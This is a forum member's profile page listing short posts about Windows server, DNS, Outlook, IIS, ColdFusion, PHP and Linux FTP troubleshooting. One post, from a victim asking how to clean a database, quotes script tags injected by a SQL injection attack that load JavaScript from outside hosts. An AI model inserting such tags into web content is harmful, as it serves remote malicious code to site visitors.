Posts
 
Reputation
Joined
Last Seen
0 Reputation Points
100% Quality Score
Upvotes Received
3
Posts with Upvotes
3
Upvoting Members
3
Downvotes Received
0
Posts with Downvotes
0
Downvoting Members
0
0 Endorsements
Ranked #425
~95.3K People Reached

309 Posted Topics

Member Avatar for swpvideo

I'm going to say that's not possible what you may try is creating a folder with read only rights and hope they aren't smart enought to go into security permissions take ownership of the folder and change the permissions

Member Avatar for rproffitt
0
743
Member Avatar for rs_sis

Go into outlook -> file -> import -> import from another program or file -> personal folder file .pst -> select the .pst for that user from the mobile backup import it to the exchange account hit send receive that will sync the local outlook with the exchange server. Repeat …

Member Avatar for elis
0
372
Member Avatar for lich
Member Avatar for RaymondXie

what's the error? in iis you need to right click the website goto properties goto advance make sure is says default 80 leave host header value blank. ip (all unassigned)

Member Avatar for Muhry
0
214
Member Avatar for freshfitz

I can't find a tutorial anywhere on how to search a sql database using a textbox and a button in asp.net any help. I'm coding in C# Sql database has a customers table I want to display firstname and lastname by searching cust_no

Member Avatar for pradeep_skiet
0
455
Member Avatar for mitre

start -> control panel -> dns -> forward lookup zones -> the zone of your domain right click the white space add host (A) record it will append it to the begining of the domain name but if you are on that domain should still be able to ping webswepper. …

Member Avatar for vimal09
0
187
Member Avatar for freshfitz

My php code to read my xml is there anyway to sort by date or event_id? [CODE]<?php $doc = new DOMDocument(); $doc->load( '../events.xml' ); $date = array(); // initialize data array $books = $doc->getElementsByTagName( "event" ); foreach( $books as $book ) { $evts = $book->getElementsByTagName( "event_id" ); $evt = $evts->item(0)->nodeValue; …

Member Avatar for twiss
0
1K
Member Avatar for ITgirl2010

Where are you coming up with 421? A /16 subnet is 255.255.0.0. The ip would be 172.18.0.whatever

Member Avatar for Casper429
0
328
Member Avatar for freshfitz

So how can you tell if you've maxed out express and need to move to the full blown version. Not referring to database size but performance? Asking because we are moving a website and the webhost master asked if he will be on express or full version claiming that express …

Member Avatar for freshfitz
0
110
Member Avatar for freshfitz

Can anyone get this to work? You can download the code here [url]http://www.mattgifford.co.uk/sexy-fi-login-forms/[/url] but i can't get it to read a success from checklogin.cfm index.cfm [CODE]<!--- Name: index.cfm Author: Matt Gifford aka coldfumonkeh Date: 11/08/2010 Purpose: Login form to demonstrate the use of the jQuery UI's shake effect. ---> <!DOCTYPE …

Member Avatar for freshfitz
0
407
Member Avatar for Xodiak101

It sounds more like a home networking issue can you describe your home network cable modem dsl modem router etc and model numbers

Member Avatar for Rick527
0
257
Member Avatar for freshfitz

I have a new install of a windows 2008 server with active directory dhcp and dns roles. I have dns settings on the dhcp options set to the servers ip then the isp 2 dns enteries under that. MY workstations periodically drop the dns name of the server i run …

Member Avatar for cguan_77
0
127
Member Avatar for freshfitz

This one has me stumped I've installed plenty of windows servers with active directory. I have one client new dell windows 2008 server(active directory, dns, and dhcp server) with xp workstations. I have the server configured at static ip 192.168.10.5. Fios router is at 192.168.10.1. I have the workstations configured …

Member Avatar for freshfitz
0
263
Member Avatar for gfolkins

Don't think it's possible you may have to boot from a drive on the motherboard and use the raid array as a data storage only. There also may be certain higher end raid pci cards that do boot.

Member Avatar for stator
0
220
Member Avatar for freshfitz

I got a sql injection hack that put this after each description in my database. <script src="http://b.adserv.cn/E/J.JS"></script><script src="http://b.rtbn2.cn/E/J.JS"></script> any idea how to remove it without deleting the descrition? Here is what I have HIM PORTRAIT SHIRT<script src="http://b.adserv.cn/E/J.JS"></script><script src="http://b.rtbn2.cn/E/J.JS"></script> Here is what I need HIM PORTRAIT SHIRT 3000 items / rows …

Member Avatar for ehotbid
0
238
Member Avatar for elmoualh
Member Avatar for Debodinno

Are you using sata or ide. If you use IDE just link the 2 with the same ribbon cable plug one end into the motherboard then the cable should have 2 more connectors one for each cd/dvd whatever. Make sure slave and primary are turned on in the bios for …

Member Avatar for ademoo
0
408
Member Avatar for superspamer

Goto the settings for abc.com and set the name servers as ns1.yyy.com and ns2.yyy.com

Member Avatar for freshfitz
0
42
Member Avatar for byallnames

If the program won't run as a service natively, then I would think you need to have an auto login setup

Member Avatar for freshfitz
0
196
Member Avatar for mahdi68

Why do you have so many partitions on that disk? Can't you right click an active partition and select extend?

Member Avatar for freshfitz
0
108
Member Avatar for freshfitz

I need to create a file to use as a template in coldfusion, so I need to insert cold fusion code to a sql database table using cold fusion or create a file with cffile? Every thing I try to use,it doesn't work because I think it is reading the …

Member Avatar for samaru
0
189
Member Avatar for sammansford
Member Avatar for 3eyedphish
Member Avatar for freshfitz

Has anyone ever seen this it's a dell inspiron laptop (sorry don't have the model) my customer upgraded to win 7 and he gets screens that look like this, We've uninstalled and re-installed the video driver 2 or 3 times. The only way to clear it up is to change …

Member Avatar for freshfitz
0
87
Member Avatar for jmflint
Member Avatar for freshfitz

We have this scripting working on one server and are trying to transfer it to a different server and we are getting this error the working server is fedora fc7 the new on is fedora fc12. When we run the script from a command line we get: web root 23:42:09 …

0
79
Member Avatar for fuggles

Is ftp running try: /etc/init.d/vsftpd start Is iptables blocking port 21 try: /etc/init.d/iptables stop Have you tried connecting with a regular ftp client by default root cannot ftp into vsftp so you have to try anonymous or create a new user. Look in /etc/vsftpd.conf to turn off anonymous access but …

Member Avatar for freshfitz
0
111
Member Avatar for exyalie

You will have to boot to a command prompt via the vista install cd I think choose the repair option run chkdsk at the command prompt and unhide the administrator account then try to login as admin run: net user administrator /active:yes

Member Avatar for freshfitz
0
102
Member Avatar for skipellis

Does disk management show a ntfs partition as healthy? right click the partition and assign it a drive letter

Member Avatar for freshfitz
0
161
Member Avatar for SpyrosMet

The End.